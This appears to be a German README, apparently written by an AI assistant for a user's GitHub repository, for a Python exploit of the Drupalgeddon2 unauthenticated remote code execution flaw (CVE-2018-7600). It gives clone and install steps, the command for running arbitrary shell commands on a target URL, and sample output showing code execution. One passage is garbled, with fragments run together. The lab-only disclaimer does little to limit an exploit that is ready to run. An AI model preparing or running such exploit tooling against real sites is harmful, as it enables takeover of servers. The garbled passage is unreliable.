
Python-Programm zur Durchführung von RCE auf Drupal Version 7.56
Bereit, Dewa, ich habe auch den Abschnitt zur Verwendung ab git clone hinzugefügt, damit die README vollständig ist.
Dies ist die endgültige Version, die du nur noch in README.md in deinem GitHub-Repo kopieren und einfügen musst.
Dieser Exploit nutzt eine Schwachstelle in Drupal 7.56 (und einigen früheren Versionen) aus, die unter dem Namen Drupalgeddon2 bekannt ist.
Diese Schwachstelle ermöglicht Remote Code Execution (RCE) ohne Authentifizierung, indem sie eine Lücke in einem verwundbaren Formular ausnutzt.
🔗 Repository: https://github.com/xxxTectationxxx/CVE-2018-7600
Dieses Skript dient nur zu Lernzwecken und für Tests in einer Laborumgebung.
Es ist verboten, es auf Systemen zu verwenden, für die keine offizielle Testgenehmigung vorliegt.
user/password mit einem Parameter, der die Funktion passthru() in PHP auslöst.form_build_id aus der Serverantwort.Repository klonen:
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
Abhängigkeiten installieren:
pip install requests
Exploit ausführen:
python3 drupalgeddon2.py --URL <target_url> --COMMAND "<command>"
Beispiel:
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
[*] Mengirim payload awal ke target...
[+] form_build_id ditemukan: form-ABC123XYZ
[+] Output command:
www-data
Haftungsausschluss: Der Autor übernimmt keine Verantwortung für den Missbrauch dieses Skripts. Verwende es mit Bedacht und nur auf Systemen, die für Tests freigegeben sind.